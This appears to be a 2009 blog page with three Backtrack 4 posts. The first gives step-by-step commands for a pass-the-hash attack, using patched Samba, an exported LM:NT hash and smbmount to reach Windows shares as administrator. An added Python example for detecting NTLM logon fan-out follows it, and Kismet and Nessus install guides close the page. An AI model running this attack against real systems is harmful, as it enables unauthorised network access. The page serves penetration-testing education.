Saturday, August 29, 2009

Pass-the-Hash Attack with Backtrack 4

For the uninitiated, a pass-the-hash attack is a way to gain access to a Windows machine without having to supply the user's password. Sounds great, yeah? Cool, now you can go ahead and delete Cain and john because your password cracking days are over? Well, not quite. Before you get too excited you should realize there's a catch -- you must first have in your possession the password hash of an account that is valid on the machine you want to compromise. So now you're probably asking yourself, "Why is that useful if I need to have access to the box in the first place?" Well, picture this:

Say you were conducting a penetration test on Company X and you were unable to crack the administrator password. Now, like most organizations, Company X is using the same administrator password on all of its machines, so gaining access to this password would allow you to pwn the entire network. Now let's say that Company X believes strongly in security and has a 20-character random password for its administrator account. So now you're screwed, right? Wrong.

By having access to just one machine that holds this master account (the administrator account in this example), you can carry out a pass-the-hash attack by 'passing' just the hash to every other machine on the network. Because the hash is all that Windows needs to complete the authentication, each target treats you as a successfully authenticated user and lets you in. Kinda cool huh?

Now that I've given you some background, here's how you go about setting it up on Backtrack 4. There are a few tweaks that need to be made in order for this to work on Backtrack 4.

Pass the Hash Attack Tutorial for Backtrack 4 Users:

1. Download Samba 3.0.22:

2. Download both of the Foofus Samba patches:

3. Extract the samba archive where you would like to access Samba from. I've chosen /opt/

4. From the directory where you have installed Samba (/opt/ for me), patch the appropriate files
# cd /opt/
# patch -p0 <samba-3.0.22-add-user.patch
# patch -p0 <samba-3.0.22-passhash.patch

5. Configure Samba with smbmount
# cd /opt/samba-3.0.22/source
# ./configure --with-smbmount

6. Compile/Install Samba (still in the /opt/samba-3.0.22/source/ directory)
# make
# make install

7. Create a mount point in order to mount the Windows share
# mkdir /mnt/target

8. Alter the fstab file to allow /mnt/target to be mounted
# pico /etc/fstab
At the bottom of the file add this entry:
none /mnt/target tmpfs defaults 0 0

9. Copy smb.conf to the correct directory
# cp /opt/samba-3.0.22/packaging/Debian/debian-woody/smb.conf /usr/local/samba/lib/smb.conf

10. Mount the target directory
# mount /mnt/target

11. Add your compromised hash to the SMBHASH environment variable
# export SMBHASH="92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63"

Note: The format for this should be "LMHASH:NTHASH"

12. Implement your pass-the-hash attack
# cd /opt/samba-3.0.22/source/bin

Usage: smbmount //target-ipaddress/sharename /mount/point -o username=username-associated-with-hash-here

# ./smbmount //$ /mnt/target -o username=administrator

13. Type an arbitrary password
At this point you will be asked to supply a password. Type anything you want here -- just make sure it's not blank. So, for example, you could just type 'blah' and hit return.

14. Check to see that you have successfully mapped the Windows share
# ls /mnt/target
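The flip side of the fan-out described above (one hash, one administrator account, every machine on the network) is that it leaves a very recognisable trail in the Windows Security logs of the targets: a burst of NTLM network logons (event 4624, logon type 3) for the same account, from one source address, to many different hosts in a short time. The Python below is an added example, not part of the original post or of the Samba/Foofus tooling; it runs a sliding-window check over a handful of constructed 4624-style records. The dict keys (`host`, `user`, `logon_type`, `auth_pkg`, `src_ip`) are my simplified stand-ins for the Computer, TargetUserName, LogonType, AuthenticationPackageName and IpAddress fields of the real event, and the hostnames, addresses and timestamps are made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records modelled on Windows Security event 4624 (successful logon).
# Field names are simplified stand-ins for the real event fields; hosts, addresses and
# timestamps are invented for this example.
SAMPLE_EVENTS = [
    {"time": "2009-08-29T10:00:05", "host": "HOST01", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "10.0.0.50"},
    {"time": "2009-08-29T10:01:10", "host": "HOST02", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "10.0.0.50"},
    {"time": "2009-08-29T10:03:42", "host": "HOST03", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "10.0.0.50"},
    # Same host again: counts as a repeat, not as a new host.
    {"time": "2009-08-29T10:04:00", "host": "HOST01", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "10.0.0.50"},
    # Kerberos logon: not the NTLM path that smbmount with SMBHASH uses, so ignored.
    {"time": "2009-08-29T10:02:00", "host": "FILESRV", "user": "jsmith",
     "logon_type": 3, "auth_pkg": "Kerberos", "src_ip": "10.0.0.60"},
    # One ordinary NTLM logon from a user to a single host: stays below the threshold.
    {"time": "2009-08-29T10:05:00", "host": "HOST02", "user": "jsmith",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "10.0.0.60"},
    # Much later logon by the admin: outside the window, on its own it is not suspicious.
    {"time": "2009-08-29T11:30:00", "host": "HOST04", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "10.0.0.50"},
]


def parse_time(stamp):
    """Parse the ISO-style timestamp used in the sample records."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S")


def find_ntlm_fanout(events, window=timedelta(minutes=10), min_hosts=3):
    """Return one alert per (source IP, account) that completed NTLM network logons
    (logon type 3) to at least `min_hosts` distinct hosts within any `window`."""
    by_actor = defaultdict(list)
    for ev in events:
        # Only network logons authenticated with NTLM are relevant to this pattern.
        if ev["logon_type"] != 3 or ev["auth_pkg"].upper() != "NTLM":
            continue
        key = (ev["src_ip"], ev["user"].lower())
        by_actor[key].append((parse_time(ev["time"]), ev["host"]))

    alerts = []
    for (src_ip, user), logons in by_actor.items():
        logons.sort()  # chronological order for the sliding window
        start = 0
        for end in range(len(logons)):
            # Slide the window start forward until the span fits inside `window`.
            while logons[end][0] - logons[start][0] > window:
                start += 1
            hosts = {host for _, host in logons[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts.append({
                    "src_ip": src_ip,
                    "user": user,
                    "hosts": sorted(hosts),
                    "first": logons[start][0].isoformat(),
                    "last": logons[end][0].isoformat(),
                })
                break  # one alert per actor is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_ntlm_fanout(SAMPLE_EVENTS):
        print(f"{alert['user']} from {alert['src_ip']} reached "
              f"{len(alert['hosts'])} hosts between {alert['first']} and {alert['last']}: "
              f"{', '.join(alert['hosts'])}")
```

Kerberos logons are skipped because the smbmount route on this page authenticates with NTLM; in a domain where administrators normally use Kerberos, an NTLM logon by the administrator account is itself worth a look. `min_hosts` and `window` are the tuning knobs for environments where one admin legitimately touches many hosts in a few minutes (patch runs, inventory jobs).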

If you would like a video tutorial on the pass-the-hash technique, please see John Strand's video:

Friday, August 7, 2009

Installing Kismet on Backtrack 4 Pre Release

Backtrack 4 has all the bells and whistles we love and have come to expect from Backtrack in the past. That said, however, as Backtrack is currently in a "Pre Release" version, there are a couple of teething issues with various bits and pieces. One such issue is with Kismet Newcore.

Kismet is our friendly little wireless stumbler that we all love. In Backtrack 4 pre release you may have noticed it is either missing functionality, or just plain doesn't work!

Here is a quick guide for you to download an alternate version of Kismet Newcore and install it on Backtrack 4:

1. Make sure your network adapter is on
# dhclient eth0

2. Change your directory to /usr/src to download the Kismet Newcore source code
# cd /usr/src

3. Download the Kismet source using the built-in Subversion client
# svn co kismet

4. Open the newly created kismet directory
# cd kismet

5. Configure and make the source code
# ./configure --prefix=/opt && make && make install

6. Now change your directory to where you want kismet to store its logging files
# cd somewhere/useful/for/your/logging/files

7. Run kismet
# /opt/bin/kismet

There you have it! A fresh version of Kismet Newcore installed.

When you run kismet, it will ask you to add a new capture source. You will (typically) add wlan0. This will change however, depending on your hardware.

Wednesday, August 5, 2009

Installing Nessus on Backtrack 4

Here is an easy-to-follow tutorial on installing Nessus on the Backtrack 4 Pre Release. This is courtesy of secure_it at the remote-exploit forums.

First download these packages


(I have chosen the Debian package because NessusClient- was missing some of its dependencies and was not installing correctly. Instead, the Debian package worked like a charm, as it is up to date with its dependencies and produces no errors at all.)

Next, register your copy to get plugin updates using the HomeFeed, and please provide a real e-mail ID, as they will send you the activation key for the HomeFeed.

Register Here

Click accept and enter a valid working email ID.

Now we start installing the packages.

root@ThUndErbOLt:~#dpkg -i Nessus-3.2.1-ubuntu804_i386.deb

Now configure the certificate & admin user for Nessus
root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-mkcert (this is necessary for communication between the Nessus client and the Nessus daemon/remote host)
(configure the options accordingly, or just press enter for the defaults)

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]:IN
Your state or province name [none]: Karnataka
Your location (e.g. town) [Paris]: Bangalore
It should show the message
Congratulations. Your server certificate was properly created.
Hit enter to come out.

Enter information about the user.
Authentication (Pass/Cert)
confirm password:
After configuring the parameters it asks for a rule-set. We have configured the admin user with full permissions. If we want to add certain users and limit them, we can use a rule-set here.
For configuring a rule-set, please refer to the nessus-adduser(8) man page for the rules syntax, as it limits the use of Nessus.
Press Ctrl + D.
It asks for confirmation. Choose y.

Now start the Nessus daemon by using
root@ThUndErbOLt:~# /etc/init.d/nessusd start
$Starting Nessus : .

Confirm that it's running using
root@ThUndErbOLt:~# netstat -ant|grep 1241
tcp 0 0* LISTEN
tcp6 0 0 :::1241 :::* LISTEN

Now install NessusClient (the GUI front end for nessusd)
root@ThUndErbOLt:~# dpkg -i NessusClient-3.2.1-debian4_i386.deb

Now register the plugin feed for updating Nessus
root@ThUndErbOLt:~#/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX(replace X with your keys)
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from
Now it will download the plugins and load them into the database. If you don't want to do this, press Ctrl + C to cancel it. Later you can download them using


Run the scan using NessusClient:
Backtrack menu -> Internet -> NessusClient
Click on the + icon
By default the selected radio box is single host
Type Host Name localhost & hit Save
Select localhost & press Connect
From the connect option box choose Edit
Set the Login & Password which we created earlier using nessus-adduser
Hit Save
Select localhost & hit Connect
The first time, it asks about logging into the Nessus server. Hit Yes

Now you can customize the default scan / Microsoft scan policy and scan. That's it!

***Note: if you are having dependency issues with the Nessus Client, use the following command: apt-get update